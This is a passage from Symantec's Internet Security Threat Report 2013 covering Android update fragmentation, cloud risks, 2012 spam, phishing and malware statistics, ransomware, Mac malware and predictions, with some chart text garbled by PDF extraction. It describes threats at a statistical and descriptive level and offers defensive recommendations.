versions regarding <strong>security</strong> features. Google added a feature in<br />
Android version 4.x to allow users to block any particular app<br />
from pushing notifications into the status bar. This came in<br />
response to feedback from users of older versions, annoyed by<br />
ad platforms that push notifications to the status bar.<br />
Also, due to the rise of threats that silently send premium text<br />
messages—Android.Opfake, Android.Premiumtext, Android.<br />
Positmob, and Android.Rufraud, for instance—Google added a<br />
feature in Android 4.2 to prompt the user to confirm sending<br />
such premium text messages. This can be very helpful in<br />
protecting most users.<br />
However, at around 10 percent market penetration at the end of<br />
2012, 24 Android 4.2 devices account only for a small percentage
p. 38<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SOCIaL NETWORkINg, MObILE, aNd ThE CLOUd<br />
of the total devices out there. The Android ecosystem makes it<br />
harder to keep everyone up to date. Google released the official<br />
platform that works out of the box only on Nexus devices—<br />
Google’s own branded device. From there each manufacturer<br />
modifies and releases its own platform, which is in turn picked<br />
up by mobile network operators who also customize those<br />
platforms.<br />
This makes it impossible for any change coming from Google<br />
to be quickly available to all in-field devices. Any change to the<br />
platform requires thorough testing by each manufacturer and<br />
then each operator, all adding to the time needed to reach users.<br />
Having so many device models also multiplies the amount of<br />
resources all these companies have to allocate for each update,<br />
leading to infrequently released updates or in some cases no<br />
updates for older devices.<br />
For most exploits in the OS, Google released quick fixes;<br />
however, users still had long waits before they received the<br />
fix from their network operators. Some exploits are not in the<br />
original OS itself but in the custom modifications made by<br />
manufacturers, such as the exploit for Samsung models that<br />
appeared in 2012. Samsung was quick to fix it, but the fix still<br />
had to propagate through network operators to reach users.<br />
Tighter control from Google over the platform can solve some of<br />
the “fragmentation” issues, but this could affect the relationship<br />
it has with manufacturers. A cut-off point for older Android<br />
users could help to mitigate the risk, but it is usually the<br />
manufacturers that do this.<br />
Cloud Computing Risks<br />
The cloud services market was expected to grow by 20 percent<br />
in 2012, according to Gartner. 25 Cloud computing promises<br />
businesses a way to enhance their IT without heavy upfront<br />
capital costs and, for smaller businesses, it offers access to<br />
enterprise-class business software at an affordable price. On<br />
a fundamental level, it offers huge and growing economies of<br />
scale as Internet bandwidth and processing power continue to<br />
increase rapidly.<br />
Cloud computing offers some potential <strong>security</strong> benefits,<br />
especially for smaller companies without dedicated IT <strong>security</strong><br />
staff. Well-run cloud applications are more likely to be patched<br />
and updated efficiently. They are also more likely to be resilient,<br />
secure, and backed up than on-premises systems.<br />
However, cloud computing presents some <strong>security</strong> concerns, too:<br />
• Privacy. Well-run cloud companies will have strong<br />
policies about who can access customer data (for example,<br />
for troubleshooting) and under what circumstances.<br />
Information should only be entrusted to a third party over<br />
the Internet where there is sufficient assurance as to how<br />
that data will be managed and accessed.<br />
• Data Liberation. Cloud computing businesses make it easy<br />
to get started, and reputable companies make it easy to<br />
extract your data (for example, archived emails or customer<br />
records) if you want to change providers. Before entrusting<br />
their data to a cloud provider, potential users should<br />
fully evaluate the terms and conditions of extracting and<br />
recovering that data at a later date.<br />
• Eggs in One Basket. As we have seen from large-scale data<br />
breaches in the last few years, attackers tend to go where<br />
they can score the most data for the least effort. If a cloud<br />
services provider stores confidential information for a<br />
large number of customers, it becomes a bigger target for<br />
attackers. A single breach at a cloud provider could be a<br />
gold mine of personal data for an attacker.<br />
• Consumerization. Companies face a significant risk of<br />
accidental or deliberate data loss when their employees<br />
use unapproved cloud systems on an ad-hoc basis. For<br />
example, if company policies make it difficult to email<br />
large files to third parties, employees may decide to use<br />
free online file sharing applications instead. The risk is<br />
that these systems may fall short of company standards<br />
for <strong>security</strong>. For example, one popular file-sharing site left<br />
all its user accounts unlocked for four hours. 26 In addition,<br />
where employees use unauthorized cloud applications for<br />
their work, such as social networking sites for marketing<br />
purposes, they open up the company to attack from Webbased<br />
malware.<br />
• Infrastructure. Although not in the wild, there is a<br />
theoretical risk that in a virtualized, multi-tenant<br />
architecture, a malicious user could rent a virtual machine<br />
and use it to launch an attack against the system by<br />
exploiting a vulnerability in the underlying hypervisor and<br />
use this to gain access to other virtual machines running in<br />
the same environment. Consideration should also be given to<br />
data encryption within the virtual machine to minimize the<br />
risk from unauthorized access to the physical hard disks.
p. 39<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SOCIaL NETWORkINg, MObILE, aNd ThE CLOUd<br />
Recommendations<br />
Social Media Threats Are a Business Issue.<br />
Companies are often unwilling to block access to social<br />
media sites altogether, but they need to find ways to protect<br />
themselves against Web-based malware on these and other<br />
sites. This means multi-layer <strong>security</strong> software at the gateway<br />
and on client PCs. It also requires aggressive patching and<br />
updating to reduce the risk of drive-by infections. Lastly, user<br />
education and clear policies are essential, especially regarding<br />
the amount of personal information users disclose online.<br />
Cloud Security Advice. 27<br />
Carry out a full risk assessment before signing up. Secure<br />
your own information and identities. Implement a strong<br />
governance framework.<br />
Protect Your Mobile Devices.<br />
Consider installing <strong>security</strong> software on mobile devices.<br />
Also, users need to be educated about the risks of<br />
downloading rogue applications and how to use their privacy<br />
and permission settings. For company-provided devices,<br />
consider locking them down and preventing the installation<br />
of unapproved applications altogether.
p. 40<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MaLWaRE<br />
SPaM<br />
aNd PhIShINg
p. 41<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MaLWaRE, SPaM, aNd PhIShINg<br />
Introduction<br />
Malware, spam, and social engineering continue to be massive,<br />
chronic problems. Although they have been around for a long<br />
time, attacks continue to evolve and they still have the potential<br />
to do serious damage to consumers and businesses.<br />
In addition, they hurt everyone by undermining confidence<br />
in the Internet. These chronic threats do not get much news<br />
coverage because they are “background noise” but that doesn’t<br />
mean that they are unimportant. A useful comparison is the<br />
difference between plane crashes and car crashes. A single plane<br />
crash makes the national news, but the daily death toll on the<br />
roads goes unreported despite killing significantly more people<br />
each year. 28<br />
The popularity of ransomware is an example of all these themes.<br />
It permanently locks people out of their computer unless they<br />
pay a swinging “fine” to the perpetrators. It’s corrosive to trust,<br />
expensive to remedy, and reveals a new level of ruthlessness and<br />
sophistication.<br />
The numbers are telling. In one example, malware called<br />
Reveton (aka Trojan.Ransomlock.G), was detected attempting<br />
to infect 500,000 computers over a period of 18 days. According<br />
to a recent Symantec survey of 13,000 adults in 24 countries,<br />
average losses per cybercrime incident are $197. 29 In the last 12<br />
months an estimated 556 million adults worldwide experienced<br />
some form of cybercrime.<br />
at a glance<br />
• With ransomware, malware has become more vicious and more<br />
profitable.<br />
• Email spam volumes fall again, down 29 percent in 2012, as<br />
spammers move to social media.<br />
• Phishing becomes more sophisticated and targets social<br />
networking sites.<br />
Irreversible ransomware locks<br />
people out of their computer<br />
unless they pay a “fine,” which<br />
in most cases does not unlock<br />
the computer.
p. 42<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MaLWaRE, SPaM, aNd PhIShINg<br />
data<br />
Spam<br />
Spam rates declined for a second year in a row, dropping from<br />
75 percent in 2011 to 69 percent of all email in 2012. In 2011<br />
we were reluctant to call this decrease in spam a permanent<br />
trend. Botnets can be rebuilt, new ones created. But several<br />
factors appear to be keeping spam rates lower than in previous<br />
years.<br />
The takedowns of spam botnets continued in 2012. In March<br />
2012 a resurrected Kelihos botnet was taken down for a second<br />
time. In July the Grum botnet was taken down. While both were<br />
significant spam botnets and contributed to the reduction in<br />
spam, undoubtedly email spammers are still feeling the pain<br />
of botnet takedowns from 2011.<br />
Additionally, pharmaceutical spam continues to decline,<br />
apparently unable to recover from the loss of the major players<br />
in the online pharmaceutical business. 30 Given advancements<br />
in anti-spam technology, plus the migration of many users to<br />
social networks as a means of communication, spammers may<br />
be diversifying in order to stay in business.<br />
This is not to say that the problem of spam has been solved.<br />
At 69 percent of all email, it still represents a significant<br />
amount of unwanted messages.<br />
As email spam rates continue to decline, we see the same social<br />
engineering techniques that have been used in email spam<br />
campaigns increasingly being adopted in spam campaigns and<br />
being promoted through social networking channels.<br />
Top 5 activity for Spam destination by geography<br />
Country %<br />
saudi Arabia 79%<br />
Bulgaria 76%<br />
chile 74%<br />
Hungary 74%<br />
china 73%<br />
Top 5 activity for Spam destination by Industry<br />
Industry %<br />
Marketing/Media 69%<br />
Manufacturing 69%<br />
recreation 69%<br />
Agriculture 69%<br />
chemical/Pharmaceutical 69%<br />
Top 5 activity for Spam destination by Company Size<br />
Organization Size %<br />
1-250 68%<br />
251-500 68%<br />
501-1,000 68%<br />
1,001-1,500 69%<br />
1,501-2,500 69%<br />
2,501+ 68%
p. 43<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MaLWaRE, SPaM, aNd PhIShINg<br />
global Spam Volume Per day in 2012<br />
Source: Symantec<br />
60<br />
50<br />
40<br />
30<br />
20<br />
10<br />
global Spam Rate – 2012 vs 2011<br />
Source: Symantec<br />
90%<br />
80<br />
70<br />
60<br />
50<br />
40<br />
30<br />
20<br />
10<br />
0<br />
JAN<br />
JAN<br />
BILLIONS<br />
FEB<br />
FEB<br />
MAR<br />
MAR<br />
APR<br />
APR<br />
MAY<br />
MAY<br />
JUN<br />
JUN<br />
JUL<br />
JUL<br />
AUG<br />
AUG<br />
SEP<br />
SEP<br />
OCT<br />
OCT<br />
NOV<br />
NOV<br />
DEC<br />
DEC<br />
2011 2012<br />
• Spam volumes were<br />
highest in August.<br />
• The estimated projection<br />
of global spam volumes<br />
decreased by 29 percent,<br />
from 42 billion spam emails<br />
per day in 2011, to 30<br />
billion in 2012.<br />
The overall average global spam<br />
rate for 2012 was 69 percent,<br />
compared with 75 percent in<br />
2011.
p. 44<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MaLWaRE, SPaM, aNd PhIShINg<br />
Pharmaceutical Spam – 2012 vs 2011<br />
Source: Symantec<br />
70%<br />
60<br />
50<br />
40<br />
30<br />
20<br />
10<br />
JAN<br />
FEB<br />
MAR<br />
APR<br />
adult/Sex/dating Spam – 2012 vs 2011<br />
Source: Symantec<br />
90%<br />
80<br />
70<br />
60<br />
50<br />
40<br />
30<br />
20<br />
10<br />
JAN<br />
FEB<br />
MAR<br />
APR<br />
MAY<br />
MAY<br />
JUN<br />
JUN<br />
JUL<br />
JUL<br />
AUG<br />
AUG<br />
SEP<br />
SEP<br />
OCT<br />
NOV<br />
DEC<br />
2011 2012<br />
OCT<br />
NOV<br />
DEC<br />
2011 2012<br />
• Pharmaceutical spam makes<br />
up 21 percent of all spam, but<br />
was overtaken by the Adult/<br />
Sex/Dating category, which<br />
now makes up 55 percent of<br />
spam.<br />
• Pharmaceutical spam in 2012<br />
declined by approximately 19<br />
percentage points compared<br />
with 2011.<br />
• Adult/Dating spam in 2012<br />
increased by approximately<br />
40 percentage points<br />
compared with 2011.<br />
• This suggests an almost<br />
direct correlation<br />
between the decline in<br />
pharmaceutical spam and<br />
the increase in dating spam.<br />
• The proportion of adult/<br />
sex/dating spam was<br />
greater in 2012 than for<br />
pharmaceutical spam in<br />
2011, but the actual volume<br />
of adult/sex/dating spam<br />
in 2012 was lower than for<br />
pharmaceutical spam in<br />
2011, since overall spam<br />
volumes were lower in 2012<br />
than in the previous year.
p. 45<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MaLWaRE, SPaM, aNd PhIShINg<br />
Phishing<br />
Email phishing rates are also down this year, from one in<br />
299 emails in 2011 to one in 414 in 2012.<br />
The decline in the use of email as a method to spread spam<br />
and carry out phishing attacks does not likely indicate a<br />
drop in activity by attackers. Rather, it appears that we<br />
are seeing a shift in activity from email to other forms<br />
of online communication, such as social networks.<br />
Top 5 activity for Phishing destination by Industry<br />
Industry 1 in<br />
Public sector 1 in 95<br />
Finance 1 in 211<br />
education 1 in 223<br />
Accommodation/catering 1 in 297<br />
Marketing/Media 1 in 355<br />
Phishing Rate – 2012 vs 2011<br />
Source: Symantec<br />
1 in 100<br />
1 in 200<br />
1 in 300<br />
1 in 400<br />
1 in 500<br />
1 in 600<br />
JAN<br />
FEB<br />
MAR<br />
APR<br />
MAY<br />
JUN<br />
JUL<br />
AUG<br />
Top 5 activity for Phishing destination by geography<br />
Country 1 in<br />
netherlands 1 in 123<br />
south Africa 1 in 177<br />
united Kingdom 1 in 191<br />
Denmark 1 in 374<br />
china 1 in 382<br />
Top 5 activity for Phishing destination by Company Size<br />
Company Size 1 in<br />
1-250 1 in 294<br />
251-500 1 in 501<br />
501-1,000 1 in 671<br />
1,001-1,500 1 in 607<br />
1,501-2,500 1 in 739<br />
2,501+ 1 in 346<br />
SEP<br />
OCT<br />
NOV<br />
DEC<br />
2011 2012<br />
• Phishing rates have dropped<br />
drastically in 2012, in many<br />
cases less than half the<br />
number for that month in<br />
the previous year.<br />
• The overall average phishing<br />
rate for 2012 was 1 in 414<br />
emails, compared with<br />
1 in 299 in 2011.
p. 46<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MaLWaRE, SPaM, aNd PhIShINg<br />
Malware<br />
One in 291 emails contained a virus in 2012, which is down from<br />
one in 239 in 2011. Of that email-borne malware, 23 percent of<br />
it contained URLs that pointed to malicious websites. This is<br />
also down from 2011, where 39 percent of email-borne malware<br />
contained a link to a malicious website.<br />
Much like the drop in spam and phishing rates, a drop in emails<br />
that contain viruses does not necessarily mean that attackers<br />
have stopped targeting users. Rather, it more likely points to a<br />
shift in tactics, targeting other online activities, such as social<br />
networking.<br />
Top 5 activity for Malware destination by geography<br />
Country 1 in<br />
netherlands 1 in 108<br />
Luxembourg 1 in 144<br />
united Kingdom 1 in 163<br />
south Africa 1 in 178<br />
Germany 1 in 196<br />
Proportion of Email Traffic in Which Virus Was detected – 2012 vs 2011<br />
Source: Symantec<br />
1 in 50<br />
1 in 100<br />
1 in 150<br />
1 in 200<br />
1 in 250<br />
1 in 300<br />
1 in 350<br />
1 in 400<br />
JAN<br />
FEB<br />
MAR<br />
APR<br />
MAY<br />
JUN<br />
JUL<br />
AUG<br />
Top 5 activity for Malware destination by Industry<br />
Industry 1 in<br />
Public sector 1 in 72<br />
education 1 in 163<br />
Finance 1 in 218<br />
Marketing/Media 1 in 235<br />
Accommodation/catering 1 in 236<br />
Top 5 activity for Malware destination by Company Size<br />
Company Size 1 in<br />
1-250 1 in 299<br />
251-500 1 in 325<br />
501-1,000 1 in 314<br />
1,001-1,500 1 in 295<br />
1,501-2,500 1 in 42<br />
2,501+ 1 in 252<br />
SEP<br />
OCT<br />
NOV<br />
DEC<br />
2011 2012<br />
• Overall numbers declined,<br />
with one in 291 emails<br />
containing a virus.<br />
• In 2011, the average rate for<br />
email-borne malware was<br />
1 in 239
p. 47<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MaLWaRE, SPaM, aNd PhIShINg<br />
Proportion of Email Traffic Containing URL Malware – 2012 vs 2011<br />
Source: Symantec<br />
70%<br />
60<br />
50<br />
40<br />
30<br />
20<br />
10<br />
JAN<br />
FEB<br />
MAR<br />
Website Malware blocked Per day<br />
Source: Symantec<br />
THOUSANDS<br />
400<br />
350<br />
300<br />
250<br />
200<br />
150<br />
100<br />
50<br />
0<br />
JUL<br />
AUG<br />
SEP<br />
OCT<br />
NOV<br />
APR<br />
DEC<br />
MAY<br />
JAN<br />
FEB<br />
JUN<br />
MAR<br />
JUL<br />
APR<br />
MAY<br />
AUG<br />
JUN<br />
JUL<br />
SEP<br />
OCT<br />
NOV<br />
DEC<br />
2011 2012<br />
AUG<br />
SEP<br />
OCT<br />
NOV<br />
DEC<br />
2011 2012<br />
• Emails that contained a<br />
malicious URL dropped<br />
significantly in 2012. In<br />
some months it was more<br />
than half the rate as it was<br />
that month in 2011.<br />
• In 2012, approximately 23<br />
percent of email malware<br />
contained a URL rather than<br />
an attachment, compared<br />
with 39 percent in 2011.<br />
• In 2012, approximately<br />
247,350 Web-based attacks<br />
were blocked each day.<br />
• In 2011, this figure was<br />
approximately 190,370<br />
per day. This represents an<br />
increase of 30 percent.
p. 48<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MaLWaRE, SPaM, aNd PhIShINg<br />
Website Exploits by Type of Website<br />
Based on Norton Safe Web data, the Symantec technology that<br />
scans the Web looking for websites hosting malware, we’ve<br />
determined that 61 percent of malicious sites are actually<br />
regular websites that have been compromised and infected<br />
with malicious code.<br />
We see Business, which covers consumer and industrial goods<br />
and service sectors, listed at the forefront this year. This could<br />
be due to the contribution of compromised sites from many<br />
SMBs that do not invest in appropriate resources to protect<br />
them. Hacking, which includes sites that promote or provide the<br />
means to carry out hacking activities, jumped to second, though<br />
it didn’t appear in the top 15 in 2011.<br />
Although the Technology and Telecommunication category,<br />
which provides information pertaining to computers, the<br />
Internet and telecommunication, ranks third this year, it sees<br />
5.7 percent of the total compromised sites, only a 1.2 percent<br />
drop from 2011. Shopping sites that provide the means to<br />
purchase products or services online remain in the top five,<br />
but Shopping sees a drop of 4.1 percent.<br />
It is interesting to note that Hosting, which ranked second<br />
in 2011, has moved down to seventh this year. This covers<br />
services that provide individuals or organizations access to<br />
online systems for websites or storage. Due to this increase in<br />
reliable and free cloud-based hosting solutions, provided by<br />
the likes of Google, Dropbox and others, we see usage moving<br />
away from unreliable hosting solutions, which could have<br />
contributed towards the drop. Blogging has also experienced a<br />
significant drop in 2012, moving down to fourth position. This<br />
could support the theory that people are moving towards social<br />
networking and exchanging information through such networks.<br />
Malware developers find it easy to insert malicious code in such<br />
sites and spread them using various means.<br />
Website Exploits by Type of Website<br />
Source: Symantec<br />
Rank<br />
Top Domain Categories that<br />
Got Exploited by # of Sites<br />
1 Business 7.7%<br />
2 Hacking 7.6%<br />
3 technology and telecommunication 5.7%<br />
4 Blogging 4.5%<br />
5 shopping 3.6%<br />
6 Known Malware Domain 2.6%<br />
7 Hosting 2.3%<br />
8 Automotive 1.9%<br />
9 Health 1.7%<br />
10 educational 1.7%<br />
Top 10 Malware in 2012<br />
Source: Symantec<br />
Rank Malware Name %<br />
1 W32.sality.Ae 6.9%<br />
2 W32.ramnit.B 5.1%<br />
3 W32.Downadup.B 4.4%<br />
4 W32.Virut.cF 2.2%<br />
5 W32.sillyFDc 1.1%<br />
6 W32.Mabezat.B 1.1%<br />
7 W32.Xpaj.B 0.6%<br />
8 W32.changeup 0.6%<br />
9 W32.Downadup 0.5%<br />
10 W32.imaut 0.4%<br />
# of Infected<br />
Sites/Total # of<br />
Infected Sites
p. 49<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MaLWaRE, SPaM, aNd PhIShINg<br />
analysis<br />
Macs Under Attack<br />
Historically, Mac users have felt less vulnerable to malware than<br />
PC users. As Apple has gained market share, Macs have become<br />
a more attractive target. In fact, 2012 saw the first significant<br />
Mac malware outbreak. The Flashback attack exploited a<br />
vulnerability in Java to create a cross-platform threat. 31 It was<br />
incorporated into the Blackhole attack toolkit and used by<br />
criminals to infect 600,000 Macs, 32 which is approximately one<br />
Mac in 100. Like more and more attacks in 2012, as discussed in<br />
the “Web Attack Toolkits” section, it spread when users visited<br />
infected websites. Although the Flashback malware was mainly<br />
used for advertising click fraud, it had other capabilities, such as<br />
giving hackers remote access to infected computers. 33 Because<br />
most Mac users do not have antivirus software, the chances of<br />
detection, once infected, were small.<br />
10<br />
9<br />
8<br />
7<br />
6<br />
5<br />
4<br />
3<br />
2<br />
1<br />
2007<br />
2008<br />
2009<br />
2010<br />
Does this indicate that hackers are going to start paying further<br />
attention to Macintosh computers as a platform to target? Not<br />
necessarily. While Mac users may encounter an occasional<br />
threat here or there, the vast majority of what they encounter is<br />
malware aimed at Windows computers. In fact, of all the threats<br />
encountered by Symantec customers who used Mac computers<br />
in the last quarter of 2012, only 2.5 percent of them were<br />
actually written specifically for Macs.<br />
This isn’t to say that Macs are a safer alternative to PCs; as we’ve<br />
seen, they’re just as susceptible to attacks. There were more<br />
threats created specifically for the Mac in 2012 than in years<br />
past and the trend appears to be rising.<br />
10<br />
MAC THREAT<br />
FAMILIES IN 2012<br />
2011<br />
2012<br />
There were more unique threats<br />
for OS X in 2012 than any year<br />
previously.
p. 50<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MaLWaRE, SPaM, aNd PhIShINg<br />
Rise of Ransomware<br />
Ransomware became a bigger challenge in 2012 as its popularity<br />
among malware authors increased. Unlike scareware, which<br />
encouraged you to buy fake antivirus protection, ransomware<br />
just locks your computer and demands a release fee. The<br />
malware is often quite sophisticated, difficult to remove, and in<br />
some cases it persists in safe mode, blocking attempts at remote<br />
support.<br />
Victims usually end up with ransomware from drive-by<br />
downloads when they are silently infected visiting websites<br />
that host Web attack toolkits. This ransomware is often from<br />
legitimate sites that have been compromised by hackers who<br />
insert the malicious download code. Another source of infection<br />
is malvertisements where criminals buy advertising space<br />
on legitimate websites and use it to hide their attack code, as<br />
discussed in the malvertisement section.<br />
Typical ransomware locking screen showing a fake police warning.<br />
The perpetrators use social engineering to increase the chances<br />
of payment. The locking screen often contains a fake warning<br />
from local law enforcement and the ransom is presented as a<br />
fine for criminal activity online. In some cases, ransomware also<br />
takes a photo of the victim using a webcam and displays this<br />
image in the locking screen, which can be unnerving for victims.<br />
Criminals use anonymous money transfer systems or prepaid<br />
credit cards to receive the payments. The ransom typically<br />
ranges between $50 and $400. In many cases, payment doesn’t<br />
unlock the computer. Symantec monitored a ransomware<br />
command and control server and saw 5,300 computers infected.<br />
About three percent of victims paid the ransom, which netted<br />
the criminals about $30,000.
p. 51<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MaLWaRE, SPaM, aNd PhIShINg<br />
Long-term Stealthy Malware<br />
Internet criminals are also making money from malware that<br />
stays hidden on the victims’ computers. Operating in botnets<br />
with many thousands of computers acting collectively, these<br />
stealthy programs send out spam or generate bogus clicks on<br />
website advertisements (which generate referral income for the<br />
site owners). These techniques don’t generate rapid returns like<br />
ransomware; however, they are much less likely to be discovered<br />
and, thanks to clever coding, are more difficult to remove.<br />
Consequently, they can generate a constant stream of revenue<br />
over time.<br />
Email Spam Volume Down<br />
After decreases in 2011, this year saw a further reduction in the<br />
volume of email spam from 76 percent of all email messages<br />
to 69 percent. There are several reasons for this. First, law<br />
enforcement action has closed down several botnets, reducing<br />
the number of messages being sent. 34 Second, spammers are<br />
increasingly redirecting their efforts to social media sites<br />
instead of email. Lastly, spammers are improving the quality and<br />
targeting of their spam messages in an effort to bypass filters<br />
and this has led to a reduction in the overall numbers being sent.<br />
Advanced Phishing<br />
While spam has declined slightly in 2012, phishing attacks have<br />
increased. Phishers are using very sophisticated fake websites—<br />
in some cases, perfect replicas of real sites—to trick victims into<br />
revealing personal information, passwords, credit card details,<br />
and bank credentials. In the past they relied more on fake<br />
emails, but now those emails coupled with similar links posted<br />
on social media sites are used to lure the victim to these more<br />
advanced phishing websites.<br />
Typical fake sites include banks and credit card companies, as<br />
you’d expect, but also popular social media sites. The number<br />
of phishing sites that spoofed social network sites increased<br />
123 percent in 2012.<br />
If criminals can capture your social media login details, they can<br />
use your account to send phishing emails to all your friends. A<br />
message that seems to come from a friend appears much more<br />
trustworthy. Another way to use a cracked social media account<br />
is to send out a fake message to someone’s friends about some<br />
kind of emergency. For example, “Help! I’m stuck overseas<br />
and my wallet has been stolen. Please send $200 as soon as<br />
possible.”<br />
In an attempt to bypass <strong>security</strong> and filtering software,<br />
criminals use complex website addresses and nested URL<br />
shortening services. They also use social engineering to<br />
motivate victims to click on links. In the last year, they have<br />
focused their messages around celebrities, movies, sports<br />
personalities, and attractive gadgets such as smartphones<br />
and tablets. The number of phishing websites that used SSL<br />
certificates in an attempt to lull victims into a false sense of<br />
<strong>security</strong> increased by 46 percent in 2012 compared with the<br />
previous year.<br />
We saw a significant (threefold) rise in non-English phishing in<br />
2012. In particular, we saw a significant increase in South Korea.<br />
The non-English languages that had the highest number of<br />
phishing sites were French, Italian, Portuguese, Chinese,<br />
and Spanish.
p. 52<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MaLWaRE, SPaM, aNd PhIShINg<br />
Recommendations<br />
Protect Yourself Against Social Engineering.<br />
For individuals as well as for businesses, it’s essential that<br />
people learn to spot the telltale signs of social engineering,<br />
which can include undue pressure, titillation or a false sense<br />
of urgency, an offer that is literally too good to be true, bogus<br />
“officialese” in an attempt to make something look authentic<br />
(for example, lengthy reference numbers), implausible<br />
pretexts (for example, a Microsoft “representative” calls to<br />
tell you that your computer has a virus), and false quid-proquo<br />
offers (for example, receive a free gift when you provide<br />
personal or confidential information).<br />
Avoid Ransomware.<br />
Avoid marginal websites and, in particular, pirate software<br />
and adult sites. Do not install unsolicited plug-ins or<br />
executables if prompted to do so, even on legitimate websites.<br />
Consider using advertising blocker software in your browser.<br />
Ensure that your computer is up to date with the latest<br />
patches and updates to increase your resistance to drive-by<br />
Web infections. Keep backups and recovery disks so you can<br />
unlock your computer in an emergency. And, of course, have<br />
effective, up-to-date <strong>security</strong> software.<br />
Think Before You Click.<br />
That unsolicited email from a known acquaintance, such as<br />
your mother or coworker, may not be legit. Their account<br />
may have been compromised, if they’ve fallen for a social<br />
engineering trick.<br />
Antivirus on Endpoints Is Not Enough.<br />
On endpoints (desktops/laptops), signature-based antivirus<br />
alone is not enough to protect against today’s threats and<br />
Web-based attack toolkits. Deploy and use a comprehensive<br />
endpoint <strong>security</strong> product that includes additional layers of<br />
protection, including:<br />
• Endpoint intrusion prevention that protects against<br />
unpatched vulnerabilities from being exploited, protects<br />
against social engineering attacks, and stops malware<br />
from ever making it onto endpoints;<br />
• Browser protection for protection against obfuscated Webbased<br />
attacks;<br />
• Heuristic file-based malware prevention to provide more<br />
intelligent protection against unknown threats;<br />
• File and Web-based reputation solutions that provide a<br />
risk-and-reputation rating of any application and website<br />
to prevent rapidly mutating and polymorphic malware;<br />
• Behavioral prevention capabilities that look at the<br />
behavior of applications and malware and prevent<br />
malware;<br />
• Application control settings that can prevent applications<br />
and browser plug-ins from downloading unauthorized<br />
malicious content;<br />
• Device control settings that prevent and limit the types of<br />
USB devices to be used.
p. 53<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
LOOkINg ahEad
p. 54<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
Looking ahead<br />
“Never make predictions,” said a wise man, “especially about the future.” But we can<br />
extrapolate from this year’s data to speculate on future trends in the hope that this will help<br />
organizations and individuals protect themselves more effectively. Looking ahead, here are<br />
our priorities and concerns for the coming year:<br />
More State-sponsored Cyber Attacks<br />
The last few years have seen increasingly sophisticated and<br />
widespread use of cyber attacks. In peacetime, they provide<br />
plausible deniability; in wartime, they could be an essential<br />
tool. Cyber attacks will continue to be an outlet where tensions<br />
between countries are played out. Moreover, in addition to<br />
state-sponsored attacks, non-state sponsored attacks, including<br />
attacks by nationalist activists against those whom they perceive<br />
to be acting against their country’s interest, will continue.<br />
Security companies and businesses need to be prepared for<br />
blowback and collateral damage from these attacks and, as<br />
ever, they need to make strenuous efforts to protect themselves<br />
against targeted attacks of all kinds.<br />
Sophisticated Attack Techniques Trickle Down<br />
Know-how used for industrial espionage or cyberwarfare will be<br />
reverse-engineered by criminal hackers for commercial gain. For<br />
example, the zero-day exploits used by the Elderwood Gang will<br />
be exploited by other malware authors. Similarly the “opensourcing”<br />
of malware toolkits such as Zeus (also known as Zbot),<br />
perhaps in an effort to throw law enforcement off the trail of the<br />
original authors, will make it easier for authors to create new<br />
malware.<br />
Websites Will Become More Dangerous<br />
Drive-by infections from websites will become even more<br />
common and even harder to block without advanced <strong>security</strong><br />
software. Criminals will increasingly attack websites, using<br />
malvertising and website attack kits, as a means of infecting<br />
users. Software vendors will come under pressure to increase<br />
their efforts in fixing vulnerabilities promptly. Users and<br />
companies that employ them will need to be more proactive<br />
about maintaining their privacy and <strong>security</strong> in this new social<br />
media world.<br />
Social Media Will Be a Major Security Battleground<br />
Social media websites already combine elements of an<br />
operating system, a communications platform, and an<br />
advertising network. As they go mobile and add payment<br />
mechanisms, they will attract even more attention from online<br />
criminals with malware, phishing, spam, and scams. Traditional<br />
spam, phishing, and malware will hold steady or decline<br />
somewhat; however, social media attacks will grow enormously.<br />
As new social media tools emerge and become popular, criminals<br />
will target them. Further, we think that the intersection of<br />
smartphones and social media will become an important<br />
<strong>security</strong> battleground as criminals target teenagers, young<br />
adults, and other people who may be less guarded about their<br />
personal data and insufficiently <strong>security</strong>-minded to protect their<br />
devices and avoid scams.<br />
Attacks Against Cloud Providers Will Increase<br />
So far, the very big data breaches have occurred in businesses<br />
that collect a lot of personal data, such as healthcare providers,<br />
online retailers or games companies. In <strong>2013</strong> we expect to see a<br />
variety of attacks against cloud software providers.<br />
Increasingly Vicious Malware<br />
Malware has advanced from being predominantly about data<br />
theft and botnets (although both are still very common) through<br />
fake antivirus scams to increased ransomware attacks in 2012.<br />
We expect to see these attacks become harder to undo, more<br />
aggressive, and more professional over time. Once criminals<br />
see that they can get a high conversion rate from this kind of<br />
extortion, we may see other manifestations, such as malware<br />
that threatens to and then actually deletes the contents of<br />
your hard disk. This was the case of the Shamoon attacks that<br />
occurred in August and erased data from the infected computer.<br />
Essentially, if it is possible, someone will try it; if it is profitable,<br />
many people will do it.
p. 55<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
Mobile Malware Comes of Age<br />
Just as social media is becoming the new “operating system” for<br />
computers, mobile phones and tablets are becoming the new<br />
hardware platform. Tablet adoption and smartphone market<br />
penetration will continue and this will attract criminals. What<br />
has evolved over a decade on PCs is emerging more rapidly on<br />
